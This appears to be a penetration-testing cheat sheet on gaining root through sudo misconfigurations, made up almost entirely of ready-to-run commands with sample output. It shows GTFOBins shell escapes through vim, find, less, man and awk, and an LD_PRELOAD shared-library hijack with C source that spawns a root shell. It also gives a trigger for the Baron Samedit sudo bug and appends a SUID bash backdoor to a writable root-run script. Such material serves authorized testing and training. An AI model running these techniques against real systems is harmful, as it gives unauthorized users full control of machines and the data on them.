SUDO

Check sudo permissions

What can you run as root? — First thing to check always

sudo -l
Example Output
sudo -l
User www-data may run:
  (root) NOPASSWD: /usr/bin/vim
  (root) NOPASSWD: /usr/bin/find
  (ALL) NOPASSWD: /opt/backup.sh
(Check GTFOBins for vim and find)

GTFOBins lookup

Abuse allowed binaries — BOOKMARK THIS SITE

https://gtfobins.github.io/
Search for each sudo binary
Example Output
sudo -l shows: (root) NOPASSWD: /usr/bin/find

GTFOBins: https://gtfobins.github.io/gtfobins/find/
Sudo: sudo find . -exec /bin/sh \; -quit

# whoami
root

Sudo with no password

Run directly without password — Free root commands

If (NOPASSWD) in sudo -l output
Example Output
sudo -l
(root) NOPASSWD: /usr/bin/vim

sudo vim -c ':!bash'
# whoami
root
(No password prompt = direct escalation)

Sudo env_keep (LD_PRELOAD)

Hijack shared library loading — Runs your code as root

If env_keep+=LD_PRELOAD:
gcc -shared -fPIC -o /tmp/pe.so pe.c
sudo LD_PRELOAD=/tmp/pe.so <allowed_cmd>
Example Output
sudo -l shows: env_keep+=LD_PRELOAD

Compile:
#include <stdio.h>
void _init() { setuid(0); system("/bin/bash"); }

sudo LD_PRELOAD=/tmp/pe.so /usr/bin/allowed_command
# whoami
root

Sudo version exploit

sudo < 1.8.28 = CVE-2019-14287 sudo < 1.9.5p2 = CVE-2021-3156 — Baron Samedit, etc

sudo --version
Search: sudo <version> exploit
Example Output
sudo --version
Sudo version 1.8.31

CVE-2021-3156 (Baron Samedit):
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): corrupted
(Vulnerable! Use exploit for root)

Sudo with shell escape

Many programs have shell escapes — Check GTFOBins for each binary

sudo vim -> :!sh
sudo less -> !sh
sudo man -> !sh
sudo awk 'BEGIN {system("/bin/sh")}'
Example Output
sudo vim -c ':!sh'

# whoami
root
(Escaped to root shell via vim)

Sudo script injection

Edit the script, add reverse shell — Writable scripts run as root

If sudo allows running a script you can modify
Example Output
sudo -l: (root) /opt/backup.sh

ls -la /opt/backup.sh
-rwxrwxrwx 1 root root  <- WORLD WRITABLE!

echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /opt/backup.sh
sudo /opt/backup.sh
/tmp/rootbash -p
# whoami
root